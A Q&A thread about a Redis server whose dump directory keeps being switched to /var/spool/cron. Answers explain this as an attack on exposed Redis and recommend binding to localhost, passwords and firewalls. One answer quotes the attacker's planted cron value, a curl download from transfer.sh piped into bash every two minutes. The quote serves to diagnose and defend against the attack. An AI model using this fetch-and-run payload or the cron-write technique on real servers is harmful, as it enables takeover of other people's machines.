# Redis config dir periodically modified to "/var/spool/cron" with "Failed opening .rdb for saving: Permission denied" error

Tags: redis, cron, permission-denied, redis-server

I have set up my redis-server so that `CONFIG GET dir --> "/var/lib/redis"` and `CONFIG GET dbfilename --> "redis.rdb"`.

However, after my server has been running a few hours or a few days, I start getting the `"Failed opening .rdb for saving: Permission denied"` error.

If I again do `CONFIG GET dir --> "/var/spool/cron"` and `CONFIG GET dbfilename --> "root"`.  I have tried looking all over the place for some kind of understanding of what is happening, but without avail.

If I simply restart my redis-server, then the config is once again reset to the original settings that I set up in the "redis.conf" file.

Comment: Sounds like someone is trying to attack your server. Put a password at the very least.

Comment: @ItamarHaber reckon that you could be right.

Comment: Sorry, you should consider burning the server and starting from fresh

Answer (score 12):

This is indeed an attack. If you check your redis keys after this happens you will see few "string" keys like this: "Backup1", "Backup2", "Backup3".

The value of these will be something like this:

```
"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"
```

This is meant to modify your crontab.

Bottom line is - don't have redis port opened to the world.

Comment: Just fell victim to this attack as well. Turns out I had DMZ on my router set to my machine's IP... Thanks!

Comment: I get exactly this only a few hours after rolling a new instance, and forgot to set firewall first! The redis server is inside an docker container. What should I do other than trying to recreate the instance all over again?

Comment: Just got hacked also! I changed security groups and spun-up container again after deleting volumes and settings passwords. What else should I do? Could the attacker have gained access to the entire server?

Answer (score 0):

It seems as this may just be a security issue.  Out of the box redis is accessible via any IP addresses.  As a simple first step to check that this was a security issue as suggested by @ItamarHaber, I simply bound the redis server to localhost and now the problem seems to have resolved itself.  Here is a great article that helped me with this.[A few things about Redis security](http://antirez.com/news/96)

Answer (score 0):

this can be solved by restart VM, enable UFW firewall, allow those ip address which are autherised to access.